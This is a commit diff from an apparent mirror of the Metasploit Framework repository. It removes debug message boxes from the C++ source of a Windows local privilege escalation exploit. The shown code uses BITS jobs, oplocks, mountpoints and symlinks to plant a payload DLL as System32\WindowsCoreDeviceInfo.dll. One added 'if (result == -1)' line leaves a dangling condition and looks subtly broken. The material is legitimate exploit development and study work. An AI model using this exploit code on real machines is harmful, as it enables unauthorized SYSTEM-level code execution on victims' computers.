mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-02 07:40:19 +02:00
Recompile everything so we don't have the messagebox calls
This commit is contained in:
parent
d716580ffa
commit
586971428a
Binary file not shown.
Binary file not shown.
@ -136,8 +136,8 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
|
|||||||
// ========================================================================
|
// ========================================================================
|
||||||
// Reconstruct the full path of the TMP file
|
// Reconstruct the full path of the TMP file
|
||||||
// ========================================================================
|
// ========================================================================
|
||||||
swprintf_s(m_wszBitsTempFilePath, MAX_PATH, L"%ls%ls", m_wszBaitDirPath, m_wszBitsTempFileName);
|
int result = swprintf_s(m_wszBitsTempFilePath, MAX_PATH, L"%ls%ls", m_wszBaitDirPath, m_wszBitsTempFileName);
|
||||||
|
if (result == -1)
|
||||||
if (DEBUG) { wprintf_s(L"[DEBUG] BITS temp file path: '%ls'\n", m_wszBitsTempFilePath); }
|
if (DEBUG) { wprintf_s(L"[DEBUG] BITS temp file path: '%ls'\n", m_wszBitsTempFilePath); }
|
||||||
|
|
||||||
|
|
||||||
@ -166,7 +166,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
|
|||||||
|
|
||||||
return FALSE;
|
return FALSE;
|
||||||
}
|
}
|
||||||
|
|
||||||
wprintf_s(L"[*] BITS job has been resumed. Waiting for the oplock to be triggered...\n");
|
wprintf_s(L"[*] BITS job has been resumed. Waiting for the oplock to be triggered...\n");
|
||||||
|
|
||||||
oplock->WaitForLock(INFINITE);
|
oplock->WaitForLock(INFINITE);
|
||||||
@ -199,7 +198,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
|
|||||||
|
|
||||||
if (DEBUG) { wprintf_s(L"[DEBUG] Created mountpoint: '%ls' -> '%ls'.\n", m_wszMountpointDirPath, wszBaseObjDir); }
|
if (DEBUG) { wprintf_s(L"[DEBUG] Created mountpoint: '%ls' -> '%ls'.\n", m_wszMountpointDirPath, wszBaseObjDir); }
|
||||||
|
|
||||||
|
|
||||||
// ========================================================================
|
// ========================================================================
|
||||||
// Create symlinks
|
// Create symlinks
|
||||||
// ========================================================================
|
// ========================================================================
|
||||||
@ -220,7 +218,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
|
|||||||
delete oplock;
|
delete oplock;
|
||||||
return FALSE;
|
return FALSE;
|
||||||
}
|
}
|
||||||
|
|
||||||
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
|
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
|
||||||
|
|
||||||
// --- Local file -> target DLL ---
|
// --- Local file -> target DLL ---
|
||||||
@ -238,7 +235,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
|
|||||||
delete oplock;
|
delete oplock;
|
||||||
return FALSE;
|
return FALSE;
|
||||||
}
|
}
|
||||||
|
|
||||||
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
|
wprintf_s(L"[*] Created Symlink: '%ls' -> '%ls'\n", wszLinkName, wszLinkTarget);
|
||||||
|
|
||||||
|
|
||||||
@ -274,7 +270,6 @@ BOOL BitsArbitraryFileMove::Run(LPCWSTR pwszSrcFile, LPCWSTR pwszDstFile)
|
|||||||
|
|
||||||
ZeroMemory(wszMsg, MAX_MSG * sizeof(WCHAR));
|
ZeroMemory(wszMsg, MAX_MSG * sizeof(WCHAR));
|
||||||
swprintf_s(wszMsg, MAX_MSG, L"[+] Found target file '%ls'. Exploit successfull!\n", m_wszTargetFilePath);
|
swprintf_s(wszMsg, MAX_MSG, L"[+] Found target file '%ls'. Exploit successfull!\n", m_wszTargetFilePath);
|
||||||
|
|
||||||
PrintSuccess(wszMsg);
|
PrintSuccess(wszMsg);
|
||||||
|
|
||||||
return TRUE;
|
return TRUE;
|
||||||
@ -442,7 +437,6 @@ BOOL BitsArbitraryFileMove::TargetFileExists()
|
|||||||
|
|
||||||
if (!IsWow64Process(hProcess, &bWow64Process))
|
if (!IsWow64Process(hProcess, &bWow64Process))
|
||||||
{
|
{
|
||||||
MessageBoxW(NULL, L"IsWow64Process failed...", L"The Caption", MB_OK);
|
|
||||||
wprintf_s(L"[!] IsWow64Process() failed (Err: %d).\n", GetLastError());
|
wprintf_s(L"[!] IsWow64Process() failed (Err: %d).\n", GetLastError());
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -451,7 +445,6 @@ BOOL BitsArbitraryFileMove::TargetFileExists()
|
|||||||
// Disable WOW64 file system redirector
|
// Disable WOW64 file system redirector
|
||||||
if (!Wow64DisableWow64FsRedirection(&pOldValue))
|
if (!Wow64DisableWow64FsRedirection(&pOldValue))
|
||||||
{
|
{
|
||||||
MessageBoxW(NULL, L"Failed at Wow64DisableWow64FsRedirection", L"The Caption", MB_OK);
|
|
||||||
wprintf_s(L"[!] Wow64DisableWow64FsRedirection() failed (Err: %d).\n", GetLastError());
|
wprintf_s(L"[!] Wow64DisableWow64FsRedirection() failed (Err: %d).\n", GetLastError());
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -472,7 +465,6 @@ BOOL BitsArbitraryFileMove::TargetFileExists()
|
|||||||
// Enable WOW64 file system redirector
|
// Enable WOW64 file system redirector
|
||||||
if (!Wow64RevertWow64FsRedirection(pOldValue))
|
if (!Wow64RevertWow64FsRedirection(pOldValue))
|
||||||
{
|
{
|
||||||
MessageBoxW(NULL, L"Failed at Wow64DisableWow64FsRedirection call 2 failed!", L"The Caption", MB_OK);
|
|
||||||
wprintf_s(L"[!] Wow64RevertWow64FsRedirection() failed (Err: %d).\n", GetLastError());
|
wprintf_s(L"[!] Wow64RevertWow64FsRedirection() failed (Err: %d).\n", GetLastError());
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -532,16 +524,12 @@ void BitsArbitraryFileMove::CleanUp()
|
|||||||
// Remove bait directory
|
// Remove bait directory
|
||||||
if (wcslen(m_wszBaitDirPath) > 0)
|
if (wcslen(m_wszBaitDirPath) > 0)
|
||||||
{
|
{
|
||||||
MessageBoxA(NULL, "Removing Bait Directory!!!", "TEST", MB_OK);
|
|
||||||
MessageBoxW(NULL, m_wszBaitDirPath, L"THE DIRECTORY", MB_OK);
|
|
||||||
if (GetFileAttributes(m_wszBaitDirPath) != INVALID_FILE_ATTRIBUTES)
|
if (GetFileAttributes(m_wszBaitDirPath) != INVALID_FILE_ATTRIBUTES)
|
||||||
{
|
{
|
||||||
if (!RemoveDirectory(m_wszBaitDirPath)) {
|
if (!RemoveDirectory(m_wszBaitDirPath)) {
|
||||||
MessageBoxA(NULL, "Failed to remove bait directory, error occurred!", "ERROR", MB_OK);
|
|
||||||
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszBaitDirPath, GetLastError());
|
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszBaitDirPath, GetLastError());
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
MessageBoxA(NULL, "Removed Bait Directory!!!", "TEST", MB_OK);
|
|
||||||
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszBaitDirPath); }
|
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszBaitDirPath); }
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@ -550,16 +538,12 @@ void BitsArbitraryFileMove::CleanUp()
|
|||||||
// Remove workspace directory
|
// Remove workspace directory
|
||||||
if (wcslen(m_wszWorkspaceDirPath) > 0)
|
if (wcslen(m_wszWorkspaceDirPath) > 0)
|
||||||
{
|
{
|
||||||
MessageBoxA(NULL, "Removing Workspace Directory!!!", "TEST", MB_OK);
|
|
||||||
MessageBoxW(NULL, m_wszWorkspaceDirPath, L"THE DIRECTORY", MB_OK);
|
|
||||||
if (GetFileAttributes(m_wszWorkspaceDirPath) != INVALID_FILE_ATTRIBUTES)
|
if (GetFileAttributes(m_wszWorkspaceDirPath) != INVALID_FILE_ATTRIBUTES)
|
||||||
{
|
{
|
||||||
if (!RemoveDirectory(m_wszWorkspaceDirPath)) {
|
if (!RemoveDirectory(m_wszWorkspaceDirPath)) {
|
||||||
MessageBoxA(NULL, "Failed to remove workspace directory, error occurred!", "ERROR", MB_OK);
|
|
||||||
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszWorkspaceDirPath, GetLastError());
|
wprintf_s(L"[!] RemoveDirectory('%ls') failed (Err: %d).\n", m_wszWorkspaceDirPath, GetLastError());
|
||||||
}
|
}
|
||||||
else {
|
else {
|
||||||
MessageBoxA(NULL, "Removed workspace directory!", "Success!", MB_OK);
|
|
||||||
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszWorkspaceDirPath); }
|
if (DEBUG) { wprintf_s(L"[DEBUG] Removed directory '%ls'.\n", m_wszWorkspaceDirPath); }
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -89,22 +89,15 @@ DWORD exploit(char * metasploitDLLPath) {
|
|||||||
|
|
||||||
const WCHAR* targetDLLPath = L"C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll";
|
const WCHAR* targetDLLPath = L"C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll";
|
||||||
|
|
||||||
MessageBoxA(NULL, "Loaded successfully", "The Caption", MB_OK);
|
|
||||||
|
|
||||||
HANDLE hProcessHeap = GetProcessHeap();
|
HANDLE hProcessHeap = GetProcessHeap();
|
||||||
DWORD pathSize = sizeof(metasploitDLLPath);
|
DWORD pathSize = sizeof(metasploitDLLPath);
|
||||||
LPWSTR unicodeMetasploitDLLPath = AllocMultiByteToWideChar(hProcessHeap, metasploitDLLPath, &pathSize);
|
LPWSTR unicodeMetasploitDLLPath = AllocMultiByteToWideChar(hProcessHeap, metasploitDLLPath, &pathSize);
|
||||||
|
|
||||||
MessageBoxA(NULL, "Trying to run the tests now!", "Test", MB_OK);
|
|
||||||
|
|
||||||
if (!bitsArbitraryFileMove.Run(unicodeMetasploitDLLPath, targetDLLPath))
|
if (!bitsArbitraryFileMove.Run(unicodeMetasploitDLLPath, targetDLLPath))
|
||||||
{
|
{
|
||||||
MessageBoxA(NULL, "Failed setting things up", "The Caption", MB_OK);
|
|
||||||
return 1;
|
return 1;
|
||||||
}
|
}
|
||||||
|
|
||||||
MessageBoxA(NULL, "Setting things up succeeded!", "The Caption", MB_OK);
|
|
||||||
|
|
||||||
return 0;
|
return 0;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user